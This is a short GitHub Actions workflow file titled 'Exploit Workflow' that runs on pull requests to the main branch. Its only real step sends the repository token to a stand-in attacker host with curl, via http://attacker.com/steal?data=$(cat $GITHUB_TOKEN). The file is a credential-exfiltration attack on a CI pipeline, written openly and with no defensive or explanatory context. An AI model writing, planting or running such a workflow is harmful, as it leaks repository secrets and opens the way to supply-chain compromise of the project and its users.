name: Exploit Workflow

on:
  pull_request:
    branches: [ main ]

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v3

      - name: Run exploit
        run: |
          echo "Exploiting GitHub Actions"
          curl http://attacker.com/steal?data=$(cat $GITHUB_TOKEN)
